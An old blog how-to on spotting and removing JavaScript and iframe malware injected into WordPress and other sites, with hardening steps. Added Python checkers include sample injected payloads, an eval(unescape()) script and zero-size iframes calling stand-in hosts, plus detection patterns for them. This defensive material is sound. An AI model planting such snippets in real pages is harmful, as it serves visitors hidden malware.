
'How To Guide' for securing WordPress and protecting websites.

June 9, 2009, 11:14 PM, Denver Tools and Technology Examiner: Jeff Kemp (MileHighTechGuy)

I've finally eradicated the virus that has plagued my WordPress blog for almost 2 weeks now!

Woohoo, after a 2 week crash course in web security and learning how to lock down WordPress, it's finally time for me to get back to blogging again! 

As another 'How To Guide' for securing WordPress, this post is an attempt to summarize some of the things that I learned about web security, the methods that I used to identify that malware was on my website, and the many resources I currently use to secure my website from future malware attacks.

About 2 weeks ago I realized that several of my websites were hacked and some malicious code had been inserted into them. I know I'm not the only one who has dealt with or is currently dealing with website hacking, viruses, malicious code injections, and overall blog security...so hopefully summarizing my experience will help someone out there get a handle on any problems they are having.


HOW I DISCOVERED THAT MY WEBSITE HAD BEEN HACKED:

The first thing that brought a possible problem with my website to my attention was that someone mentioned to me that when they went to one of my websites, their virus detector warned them that my site had malware. Since this was the first time I had heard of any problems with any of my websites, I was surprised and at first I didn't believe it; I thought it might just be some tracking code that I use from Google Analytics or Quantcast (which was not the case).

The next thing that clued me in to the fact that I had malware injected into my website was that my RSS feed for my blog under WordPress would no longer validate.

So after searching the WordPress forums I ended up shooting an email to WordPress Support, and I was pleasantly surprised that they responded quickly with an answer, but unpleasantly surprised when WordPress Support advised me that my website had been hacked! They noticed some JavaScript code stuck at the bottom of my index.php in the root WordPress directory that didn't belong there, since it was apparently injected outside of the closing </html> tag at the bottom of the page.

I found validating the site's RSS feed to be one of the best methods for quickly determining if a website has been hacked and injected with malware:

feedvalidator.org

To see if your website contains malware, go to feedvalidator.org and test your RSS feed to see if it validates. Every WordPress request, /feed included, is served through the index.php in the WordPress root, so a script or iframe appended to the end of that file is sent after the closing </rss> tag of the feed as well, and the feed no longer parses as XML. A feed that fails for that reason is a strong sign of injected code. A feed can also fail for harmless reasons (a PHP notice printed by a plugin, a stray blank line before the <?xml declaration), so read the validator's error message and check whether the text it complains about is something you put there.

For WordPress users the URL for your RSS feed should be like this:

http://your-wordpress-domain.com/feed
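As an added illustration (not code from the original post or from feedvalidator.org), the Python below performs the first test the validator does, XML well-formedness, on three constructed feeds: a clean one, the same feed with a script appended after </rss> (what a payload glued onto the end of the WordPress root index.php produces on /feed), and one with a PHP notice printed before the XML declaration, which breaks the feed just as surely without any malware. live_feed_problems() runs the same check against a real feed URL.

```python
"""Well-formedness check for a WordPress feed, the test feedvalidator.org
applies first. Added example for this guide, not the author's code and not
feedvalidator.org's; the three sample feeds are constructed."""
import xml.etree.ElementTree as ET
from urllib.request import urlopen


def feed_problems(feed_bytes):
    """Return '' when the feed parses as XML, otherwise the parser's error
    (with line and column) so you know where in the output to look."""
    try:
        ET.fromstring(feed_bytes)
        return ""
    except ET.ParseError as exc:
        return str(exc)


def live_feed_problems(url, timeout=15):
    """Run the same check against a live feed, e.g. http://your-domain/feed."""
    with urlopen(url, timeout=timeout) as resp:
        return feed_problems(resp.read())


# A minimal valid RSS 2.0 document (constructed).
CLEAN_FEED = b"""<?xml version="1.0"?>
<rss version="2.0"><channel>
<title>Demo</title><link>http://example.com/</link>
<description>constructed sample</description>
</channel></rss>
"""

# The same feed with a script appended after </rss>: this is what a payload
# glued onto the end of the WordPress root index.php looks like on /feed,
# because index.php serves the feed too.
INJECTED_FEED = CLEAN_FEED + b"<script>eval(unescape('%3C%69%66%72%61%6D%65'))</script>\n"

# A harmless failure for contrast: a PHP notice printed before the XML
# declaration breaks the feed just as surely, with no malware involved.
NOTICE_FEED = (b"Notice: Undefined index: foo in /home/user/public_html/"
               b"wp-content/plugins/x.php on line 12\n" + CLEAN_FEED)


if __name__ == "__main__":
    for name, feed in (("clean", CLEAN_FEED), ("injected", INJECTED_FEED), ("notice", NOTICE_FEED)):
        print(name, "->", feed_problems(feed) or "well-formed")
```

The injected sample fails with "junk after document element" and the line number of the first byte after </rss>; the notice sample fails at line 1. That difference is the whole point of reading the error instead of just noting that validation failed.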


OTHER SYMPTOMS AND TELL-TALE SIGNS THAT MY WEBSITE HAD BEEN HACKED:

Another indicator that my site had been hacked was that I noticed that as one of my web pages loaded it would take an inordinate amount of time to load, and that the status bar within the browser would indicate that my website was reaching out to some unfamiliar domain like zctk.ru or pwgegrsdfs.ru.

I could see it happening, but when I searched my web pages with a word search these domains didn't show up, since the malicious code consisted of JavaScript with a bunch of 'unescapes' using encrypted code that hid these domains.

I even found that there was some bogus code that was very well disguised to look like Google Analytics code (I think only a trained eye would even see this one).

Also, when loading my site under Safari (which I only do on occasion since I am a big huge Firefox fan), I would get a warning that my site was unsafe and that Safari advised that I shouldn't load that web page.

You can check your site for malware using the free online tools Norton Safe Web or McAfee SiteAdvisor, but there is no guarantee that these services will identify your site as infected (they are useful, however, for finding out whether your site has been blacklisted, if it is notorious enough).

Digging deeper, to my horror and further embarrassment I discovered that not only was the virus injecting malicious code into my web pages, but it had also created a folder within the root of one of my parked web domains that contained about 100 html pages of some terrible stuff that I won't mention here. This domain is not a place I would normally look at, since it is a parked domain that I've had for over a year that I have mentally tagged for 'long term' development plans and basically ignored, so there should have been nothing (no files or folders) within this domain. Yet another reason why security should be the first thing on your mind, even for parked domains or old installs of Joomla, etc.


THE SCOPE OF THE PROBLEM:

I have several websites at various stages of development. This blog (www.MileHighTechGuy.com) is a fairly recent WordPress site (see post on this website's history) hosted as an add-on domain with HostGator under my main domain and account. Using add-on domains helps me to manage my sites and my customers' sites centrally with uniform security and management tools.

Even though I have several websites I initially suspected my WordPress site as the culprit since this virus seemed to show up soon after installing WordPress (although inconclusive, later I found WordPress to not necessarily be the leak in security, but possibly Joomla was since I hadn't implemented any security for the domain containing the Joomla install once it was installed...I may never really know 100% if this was the case).

With further investigation I found that there was malicious code, in the form of either JavaScript or an iframe, injected outside of the closing </html> tag at the bottom of just about every index.php, index.html, and default.html file within my whole website tree in my hosted web package with HostGator.

So the scope of the problem, like a cancer, seemed to have infiltrated all of my domains, not just my WordPress blog.

The infection included 2 Joomla sites, a standard HTML site, and a couple of parked domains awaiting development. (And as I mentioned, the virus may have possibly originated with the Joomla install even though it was my WordPress install which I was focusing on fixing).

With even more investigation I found that the malicious code had infected directories outside of the public_html directory that I upload files to: the infection had also corrupted files within the 'tmp' folder in the root of my HostGator account, which holds web logs and reports such as AWStats and Webalizer.

With the recent knowledge that my whole web tree was infected and not just my WordPress blog, I knew I was in a real fight that could even affect my livelihood if I didn't come out on top (and soon!), so I began searching the web in earnest for information on locking down all of my websites, not just WordPress.


RECURRING PROBLEM:

Before I list out the steps that I took to finally gain victory over this malicious attack, which took 2 weeks out of my planned schedule to fix, I want to mention that going through the cycle below time and time again is what it took to eradicate this virus and to keep it from returning:

  1. I would remove the malicious code (once I learned all of the many places my website had been compromised)...
  2. Try a solution to secure my website (from the list below)...
  3. Give it a little time (usually 2-3 hours is all it would take for the malicious code to show up again)...
  4. Then look for signs of the virus to see if it was still present (usually attempting to validate my RSS feed was the quickest way to see if the virus had returned).
Rinse & repeat...


WHY LOCK DOWN WORDPRESS AND PROTECT YOUR WEBSITES:

I'm going to keep this short and simple. I recommend implementing the security measures mentioned within this post for even the casual blogger or website owner for the following reasons:

Keep malicious code and viruses from infecting your customers or site visitors.

Having a virus infected website hurts your reputation if you are a web developer, web designer, blogger, IT person, or just a self proclaimed 'tech head'.

WordPress is the most popular blogging platform in the world, so if you use WordPress you are a huge target for malware and you will eventually become a web hack victim if you do nothing.

Don't let your website be used by spammers.

Don't let your website be used by unscrupulous jerks (putting it mildly to keep this G Rated!) who want to exploit your website for their malicious purposes.

Keep malicious code and viruses from infecting your local computers that you use to manage your website.

Viruses can hurt your bandwidth, your web traffic, and your search engine page ranking.

There are probably many more reasons!

WordPress is a great platform for blogging and creating websites, but out-of-the-box it has vulnerabilities that need to be addressed immediately after a new installation. I believe that new and unprotected installations of WordPress are where most malicious attacks occur.

Many WordPress users probably think they can simply:

  • Install WordPress.
  • Configure WordPress.
  • Install a theme.
  • Install some useful plugins.
  • Make some basic design modifications.
  • Begin blogging and live happily ever after!

Rather, what WordPress users should do immediately after installing WordPress is to do some basic research about WordPress security, then immediately implement basic security measures to lock down and secure WordPress before proceeding on to other tasks.

If WordPress users don't immediately secure their WordPress installation they will likely soon become a victim of malicious attacks on their website resulting in exploitations of vulnerabilities, which typically includes malware being injected into their website.

So I highly advise anyone starting out fresh with a new WordPress site to take the necessary precautions as outlined below immediately.

Similarly, if anyone is considered a newbie with WordPress, Joomla, Drupal, Mambo, or any other CMS (Content Management System) or blogging platform, they should research and implement security measures as a priority before website creation and design. Every hour a site is not protected increases the chance of a 'bot' exploiting some aspect of a website installation.


HOW TO LOCK DOWN WORDPRESS, REMOVE MALICIOUS CODE, AND PROTECT YOUR WEBSITES:

Most of the security measures outlined below apply to WordPress, and some apply to general websites, but each platform has its own distinct methods for protecting its vulnerabilities, so I encourage you to research what will suit your case best depending on your configuration.

In my recent research, and in learning how to eradicate the malicious code that infected my websites, I learned that there is no 'silver bullet', such as a simple plugin, that solves every vulnerability and protects your websites and your computer.

A multi-pronged approach with a diversified strategy is recommended as the best approach to protecting your website from the many various types of potential threats that exist.

SECURING WORDPRESS

The following is a summary of the steps that I took over the course of 2 weeks to secure WordPress and to eradicate a malicious virus that had infected my websites (with some further explanation and detail provided later in this post). I would recommend taking all of these measures (and perhaps more) as soon as possible to protect your WordPress blog and to protect all of your websites from malware:

  1. Keep WordPress updated to the latest version (always backup first...the same goes for any other web platforms you may have installed such as Joomla, Drupal, etc).
  2. Identify if you have malware on your website.
  3. Remove any identified malicious code within your web pages by reviewing the remote files either via FTP or the web console provided by your web host; in particular look for and delete anything outside the closing </html> tag (or, in a PHP file such as the WordPress root index.php, anything after the final ?>). A global search and replace doesn't always work here since the threat may be disguised in various ways, and an obfuscated script that unescapes its own payload will not contain the domain you are searching for. If the code comes back within hours of removal, the attacker still has a way in (a working FTP, cPanel or WordPress password, or a backdoor file you haven't found), and cleaning the visible files again will not fix that.
  4. Install the recommended essential security plugins for WordPress.
  5. Keep all of your plugins up-to-date (check for plugin updates daily if you can, or at least once per week).
  6. Keep your computer protected with anti-virus software (for my Mac only Norton Antivirus for Mac detected any viruses, where ClamXav and iAntiVirus did not detect anything).
  7. Use strong passwords (try this password generator from pctools; don't re-use the same passwords for many different accounts).
  8. Update your passwords frequently, and change them from a computer you trust after a cleanup; an attacker holding your FTP or hosting-account password can rewrite every file in the account without touching a WordPress bug, which would explain an infection that spans every domain under one account. (If you are suspicious of a keylogger resident on your computer, try calling your host provider to make the changes over the phone; if the problem returns anyway, you have ruled out the keylogger to some degree.)
  9. Change the security keys in wp-config.php (the AUTH_KEY, SECURE_AUTH_KEY and related key constants; use the WordPress security key generator to replace the existing values). New keys invalidate every existing login cookie, including any an attacker is holding.
  10. Set file permissions (chmod) using the file manager within the web console provided by your web host. These numbers assume PHP runs as your own account user (suPHP or FastCGI, which is how shared cPanel hosts normally run it); on a server using mod_php, where Apache runs as a shared user, PHP files must stay readable by that user (644) and 600 will produce server errors:
    1. .htpasswd files to 640
    2. .htaccess files to 644
    3. index and default files to 644
    4. php files to 600 (wp-config.php first of all, since it holds your database password and security keys)
    5. files that nobody else should ever read, and that the site never needs to write, to 400
    6. NEVER chmod 777, and do not use 766 as a substitute: 766 still lets every other account on the server write to the file, which is the whole problem with 777. If a plugin insists on a world-writable folder, use 755 (or 775 with the web server's group) and find out why it wants more.
  11. Place .htaccess files where needed (see securing your website using htaccess section of this post).
  12. Place empty index.html pages within the following directories: WordPress root, wp-content, wp-content/plugins, wp-content/uploads, and wp-includes (wp-content and plugins folders mandatory, the others for extra measure). This only stops Apache from listing the folder's contents to anyone who browses to it; an Options -Indexes line in your .htaccess does the same for every folder at once, and neither stops a file from being fetched by someone who already knows its name.
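The scanner below is an added example written for this edit, not the author's tooling. It does steps 2 and 3 of the list above on a whole web tree: for every index.php, index.html, index.htm, default.html and default.htm it reports anything after the last </html> (or, in PHP files, after the final ?>), decodes the unescape('%3C...') literals mentioned earlier so the hostnames they hide become searchable, and flags zero-size iframes. The demo tree, its file contents and the *.example hostnames are constructed; point scan_tree() at a copy of your public_html instead.

```python
"""Scan a web tree for injected code: tails after </html> (or after a PHP
file's final ?>), JavaScript unescape() payloads, and zero-size iframes.
Added example for this guide, not the author's tooling. The demo tree,
its contents and the *.example hostnames are constructed."""
import os
import re
import tempfile
from urllib.parse import quote, unquote

# The file names the guide reports as hit on every domain in the account.
TARGET_NAMES = {"index.php", "index.html", "index.htm", "default.html", "default.htm"}
HTML_CLOSE = re.compile(r"</html\s*>", re.IGNORECASE)
PHP_CLOSE = re.compile(r"\?>")
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.IGNORECASE | re.DOTALL)
HIDDEN_IFRAME = re.compile(r"""<iframe\b[^>]*\b(?:width|height)\s*=\s*["']?0\b""", re.IGNORECASE)
HOST = re.compile(r"(?:https?:)?//([a-z0-9][a-z0-9.-]*\.[a-z]{2,})", re.IGNORECASE)


def js_unescape(s):
    """JavaScript unescape(): %uXXXX code units first, then %XX bytes."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def trailing_payload(text, is_php):
    """Text after the last </html> (HTML) or last ?> (PHP), stripped.
    WordPress's root index.php outputs nothing after its ?>, so any tail is foreign."""
    closer = PHP_CLOSE if is_php else HTML_CLOSE
    end = max((m.end() for m in closer.finditer(text)), default=-1)
    return text[end:].strip() if end >= 0 else ""


def decode_unescapes(text, max_depth=5):
    """Decode every unescape('...') literal; droppers often nest a second layer."""
    decoded = []
    for _quote, body in UNESCAPE_CALL.findall(text):
        layer = js_unescape(body)
        for _ in range(max_depth):
            inner = UNESCAPE_CALL.findall(layer)
            if not inner:
                break
            layer = "".join(js_unescape(b) for _q, b in inner)
        decoded.append(layer)
    return decoded


def inspect_file(path):
    """Return {} for a file with no indicators, otherwise the evidence found."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    tail = trailing_payload(text, path.lower().endswith(".php"))
    decoded = decode_unescapes(text)
    combined = text + "\n" + "\n".join(decoded)   # decoded layers are searchable too
    hidden = bool(HIDDEN_IFRAME.search(combined))
    if not (tail or decoded or hidden):
        return {}
    # "hosts" lists every host referenced; compare it with the ones you expect.
    return {"trailing": tail[:120], "decoded": decoded, "hidden_iframe": hidden,
            "hosts": sorted({h.lower() for h in HOST.findall(combined)})}


def scan_tree(root):
    """Map relative path -> findings for every target file showing indicators."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() not in TARGET_NAMES:
                continue
            path = os.path.join(dirpath, name)
            findings = inspect_file(path)
            if findings:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return report


# Constructed demo tree: one WordPress root, one clean static site, one parked domain.
PAYLOAD = '<iframe src="http://bad-host.example/in.php" width=0 height=0></iframe>'
DEMO_FILES = {
    "index.php": "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n?>\n"
                 "<script>eval(unescape('" + quote(PAYLOAD, safe="") + "'));</script>\n",
    "old-site/index.html": '<html><body>ok<script src="http://www.google-analytics.com/ga.js">'
                           "</script></body></html>\n",
    "parked/default.html": "<html><body>Coming soon</body></html>\n"
                           '<iframe src="http://other-bad.example/x.php" width=0 height=0></iframe>\n',
}


def build_demo_tree():
    """Write DEMO_FILES into a fresh temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="webscan-")
    for rel, body in DEMO_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, findings in sorted(scan_tree(build_demo_tree()).items()):
        print(rel, "->", findings)
```

The clean static site references google-analytics.com but shows no indicator, so it is not reported; the two infected files are, with the decoded iframe host visible in plain text. Only files named in TARGET_NAMES are checked, which mirrors what the infection described here touched; widen the set if your cleanup finds other file names hit.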

Other security options to consider for advanced users:

  • Rather than uploading your files using FTP, which sends your password across the network in clear text, use SFTP or SCP over SSH (PuTTY is free SSH software for Windows, and its PSFTP and PSCP tools do the file transfers)
  • PHPIDS (PHP-Intrusion Detection System)
  • Maximum Security (not available yet)

LIST OF ESSENTIAL WORDPRESS PLUGINS FOR SECURING YOUR WORDPRESS INSTALLATION:

These are the WordPress plugins that I am currently using related to security:


  1. Akismet (rated 9 out of 10)*:  Part of a standard WordPress installation; identifies and blocks comment and trackback spam on blogs.
  2. Bad Behavior (rated 9 out of 10):  Blocks link spam and the robots that deliver it.
  3. WordPress Firewall (rated 9 out of 10):  Inspects web requests with simple WordPress-specific heuristics to identify and stop the most obvious attacks.
  4. WordPress Table Rename (rated 9 out of 10):  Renames all WordPress tables with a custom prefix. Note that a custom prefix only defeats canned attack scripts that assume the default wp_ table names; it does not fix an SQL injection flaw, which lives in whatever plugin or core code fails to escape its input.
  5. WP Security Scan (rated 9 out of 10):  Scans your WordPress installation for security weaknesses and suggests corrective actions.
  6. DigoWatchWP (rated 8 out of 10):  Scans your blog posts and pages for changes and sends an email notification of any changes.
  7. Secure WordPress (rated 8 out of 10):  Performs basic security housekeeping for WordPress: removes error information from the login page, adds index.html to the plugin directory, and removes the WordPress version except in the admin area.
  8. WP Scanner (rated 8 out of 10):  Scans your WordPress installation and reports a measure of your WordPress security level (requires the WP-Scanner Activator plugin; at the time of this writing their site was down and returning an internal server error).
  9. Paranoid911 (rated 8 out of 10):  Checks your WordPress directory and all subdirectories on the server's filesystem, plus a few WordPress database tables, for changes and sends an email when changes occur.
  10. Safer Cookie (rated 8 out of 10):  Ties the WordPress session cookie to the user's IP address so that the cookie can't be used to reach the admin panel from another computer (users whose IP address changes mid-session, for example behind some proxies or on mobile connections, will be logged out).
  11. Tinfoil Hat (rated 8 out of 10):  Gives you more configuration options over what information WordPress sends to sites other than your own.
  12. HTML Purified (rated 7 out of 10):  Replaces the default WordPress comment filters with HTML Purifier, a thorough HTML filtering library, to strip script injection (better known as XSS) from comments (it also makes your documents standards compliant).
  13. Limit Login Attempts (rated 7 out of 10):  Limits the number of login attempts possible, therefore reducing exposure to brute-force password attacks.
  14. AskApache Password Protect (rated 6 out of 10):  I was unable to use AskApache Password Protect, since the self-tests that this plugin runs showed that my particular web host configuration does not support it, but if you are able to make it work then I advise you to give it a try.
  15. WordPress Tweaks (rated 6 out of 10):  Adds many useful settings pertaining to comments, posts, SEO, security, and the administration back end. (Note: I discovered that the 2nd and 3rd options of the Comments and Pings section of WordPress Tweaks are not compatible with the IntenseDebate plugin; disable these options if you use IntenseDebate.)
  16. WP All-in-One tools (rated 6 out of 10):  Performs basic security housekeeping for WordPress such as replacing the WordPress version string, editing the SECRET_KEY in wp-config.php, fixing the image upload HTTP error, and enforcing a minimum comment length (similar to the Secure WordPress plugin but covers different issues).

Beware that not all plugins play well together. The plugins within this list all work together for me, along with a couple of dozen other plugins that I am using. I find that I often need to do a process of elimination (disable plugins one by one) to find which plugins are not cooperating with others. Note that some security-based plugins for WordPress directly help to protect your WordPress installation, and others only serve to notify you of any malicious activity so that you can take corrective action.

*(Ratings are my own evaluation based on usefulness, features, and compatibility.)

SECURING YOUR WEBSITE USING .HTACCESS:

If you have a WordPress installation or general website that you are hosting with a web host provider or your own servers (in other words pretty much any website except for a WordPress site hosted by WordPress like http://you.wordpress.com), then in addition to using security related plugins for WordPress and other security methods mentioned already, you should also secure certain folder locations within your websites with .htaccess files containing code that will help to prevent unauthorized access and malicious attacks of your web files.

Advanced users can find more information about .htaccess files in the Apache documentation. Note that .htaccess only has an effect on Apache servers where the host allows per-directory overrides (AllowOverride), which is the case on cPanel shared hosts like the one described here. (If you are fortunate enough to have an expert available to set up your Apache server configuration, including modules such as mod_security, then use .htaccess in addition to those server-level security measures.)

There are a lot of things you can do with .htaccess files, and many ways to 'skin a cat' using .htaccess files, so again this is not a comprehensive 'silver bullet' solution, but one suggested way to protect yourself that should be combined with other protective measures.

There is a fine balance between securing your website using .htaccess and breaking functionality...

In other words if you aren't really careful you may disable certain functionality on your website, especially with WordPress plugins. So be sure to check your website functionality, like plugins, rotating banners, comments, and your Admin login each time you make a change with .htaccess. Also run a check of your website functionality before using .htaccess just to be sure it isn't a plugin conflict (and not .htaccess) that is causing disruption to your website functionality.

I found that I had to dumb down several of the .htaccess suggestions that others had made on their websites just so that my website would work properly (just remark out any offending lines using the pound character '#' at the front of the command until everything works).

At the very least you should have a .htaccess file within the root of your public_html directory if you have many websites under that root, or possibly just the root of your website or WordPress installation if you are working with just one website.

Htaccess files are recursive: a .htaccess file in the root directory of your website also applies to all of its subdirectories. When a request falls under more than one .htaccess file, Apache merges the directives from each, and the file in the deeper directory wins wherever they conflict. This is useful, for instance, when you want specific directives within your WordPress root or another subdirectory that apply only to WordPress or that particular folder, but not to other subdomains or folders within your public_html directory tree.

The full post on my blog at www.MileHighTechGuy.com (http://milehightechguy.com/how-to-guide-for-securing-wordpress-and-protecting-websites/) contains the actual code suggestions for your .htaccess files.
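For illustration, here is one .htaccess fragment of the kind the full post lists. It was written for this edit and is not the author's snippet; it assumes Apache 2.2 syntax (the Order/Deny form, with the 2.4 spelling shown in a comment) and a WordPress install in the directory where the file sits. The weaker <Limit> form is included, commented out, for contrast.

```apache
# Added example, not the fragment from the author's full post.
# Place in the WordPress root; it merges with any .htaccess above it.

# Refuse directory listings for this folder and everything below it
# (the same effect as dropping an empty index.html into every folder).
Options -Indexes

# wp-config.php holds the database password and security keys; no browser
# ever needs to fetch it. The same goes for the .htaccess/.htpasswd files.
<FilesMatch "^(wp-config\.php|\.htaccess|\.htpasswd)$">
    Order allow,deny
    Deny from all
</FilesMatch>

# Weak form seen in some guides, for contrast: <Limit> applies the deny
# only to the methods it names, so a request using any other method
# (OPTIONS, PROPFIND, ...) is not covered.
# <Limit GET POST>
#     Deny from all
# </Limit>

# Apache 2.4 spelling of the same deny rule:
# <FilesMatch "^(wp-config\.php|\.htaccess|\.htpasswd)$">
#     Require all denied
# </FilesMatch>

# For wp-content/uploads/.htaccess (a separate file, not this one): nothing
# uploaded through WordPress should ever execute as PHP.
# <FilesMatch "\.php$">
#     Order allow,deny
#     Deny from all
# </FilesMatch>
```

After adding it, fetch /wp-config.php and /.htaccess in a browser and confirm you get a 403, then log in to the admin panel and post a comment to make sure nothing else broke, as the section above recommends for every .htaccess change.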


 

RECOMMENDED RESOURCES FOR SECURING WORDPRESS AND PROTECTING YOUR WEBSITES:

If you are not an advanced user you can just implement the suggestions within this post and bypass reading any of this other stuff...your choice.

The following are recommended resources for learning more about how to best secure your WordPress installation, a.k.a. 'locking down WordPress' or 'hardening WordPress', along with best practices for general website protection:

The above resource list is my best attempt to give credit where credit is due...so thank you to all of those who have shared this valuable security related information freely on the internet!


PLEASE SHARE YOUR KNOWLEDGE AND CONSTRUCTIVE COMMENTS:

Please feel free to comment on or correct anything within this post since I don't claim to be a WordPress, .htaccess, or website security guru!

Actually I'm pretty sure my site isn't as secure as it needs to be...so please lend your advice.

I'm certain that there are many other ways to lock down WordPress and to further secure websites beyond what I have put into place or noted. This is not by any means an all-inclusive or exhaustive list for how to secure your websites, and there are certainly many other extremely qualified folks out there who have something to offer regarding 'hardening WordPress' and website security.

So I invite others to post constructive comments that provide additional resources and helpful advice on:

How to prevent website hacking to protect your websites in the first place (WordPress and general websites).

How to detect malware and malicious code to know that it is present in order to respond as quickly as possible in the event of a website hack.

How to eradicate malware once it is discovered, including the best steps to take to deal with malware infections.

If you are a blog security or web security expert, here's your chance to post a link back to your website!


PROBABLY NOT THE END OF THE STORY:

Even though my websites seem safe for now, one thing I've always known, but am taking to heart especially now, is that the bad guys (like their evil master) are always coming up with new ways to exploit websites and computers and any vulnerabilities they can find. So this saga will likely continue as technology evolves and new exploits arise.

WordPress is upgrading from version 2.7.1 to 2.8 later this week on Wednesday June 10th, so I am hoping that with this upgrade that the folks at WordPress have incorporated more built-in security measures in addition to some promising new features.

Yet with every upgrade of any software there are inevitably new vulnerabilities that arise, particularly with 3rd party plugins. I'm certainly not an expert after a 2 week crash course on web security, but at least I think that because of this struggle I've learned something about blog security and web security (and implemented it), so I feel I am actually in a better place for the struggle that I've had to fight.

Please link back to this site, and Stumble it!

As always, I'd like to hear your comments.

NOTE: Any updates to this topic are posted at my website here:

http://milehightechguy.com/how-to-guide-for-securing-wordpress-and-protecting-websites/

This is a common problem for many website owners and webmasters, so if you need help I now offer a service to get rid of viruses infecting your website and to secure your website. The cost is $250 for most websites, with an option of $50/month for continued monitoring and updated protection. That way you can go about your business and not have to deal with this problem, which for me took a full month out of my busy schedule and also took my site down for a while. I think it is well worth the cost of having someone else (like myself as a consultant) deal with the security problem so that you can focus on your business and not wake up each day wondering if your site was hacked again.

Let me know if you'd be interested in having me manage your website security, and generally how it goes for you.

~Jeff (MileHighTechGuy)


Jeff Kemp, MileHighTechGuy (Golden, CO), www.MileHighTechGuy.com.

 

For more info: 
Jeff Kemp's website:  http://www.MileHighTechGuy.com
Email Jeff, MileHighTechGuy: jeff@milehightechguy.com
